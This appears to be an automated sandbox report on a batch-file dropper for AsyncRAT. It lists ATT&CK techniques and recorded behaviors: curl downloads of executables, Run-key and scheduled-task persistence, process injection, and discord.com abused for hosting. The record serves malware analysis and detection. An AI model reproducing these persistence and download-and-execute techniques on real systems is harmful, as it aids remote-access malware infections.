Malware Analysis Report

2024-08-06 13:12

Sample ID 240617-1asdzayepj
Target dropper_1.bat
SHA256 9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861
Tags
asyncrat persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861

Threat Level: Known bad

The file dropper_1.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat persistence rat

AsyncRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Async RAT payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Runs regedit.exe

Modifies data under HKEY_USERS

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-17 21:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 21:27

Reported

2024-06-17 21:29

Platform

win7-20240611-en

Max time kernel

122s

Max time network

126s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

C:\Windows\system32\chcp.com

chcp 65001

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 21:27

Reported

2024-06-17 21:29

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4856 created 604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-sdchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-penisware.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-scchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Resources\$77-sdchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-install.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" C:\Windows\Resources\$77-sdchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf C:\Windows\Resources\$77-penisware2.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4856 set thread context of 220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Resources\$77-sdchost.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-scchost.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-penisware.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-penisware2.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-install.exe C:\Windows\system32\curl.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631333142223269" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{4E6B2584-18D6-46D1-966C-53E502273C22} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{962D9999-CA7C-49E7-A38D-7C858997F3DB} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-sdchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-sdchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\helppane.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\helppane.exe N/A
N/A N/A C:\Windows\helppane.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3548 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\curl.exe

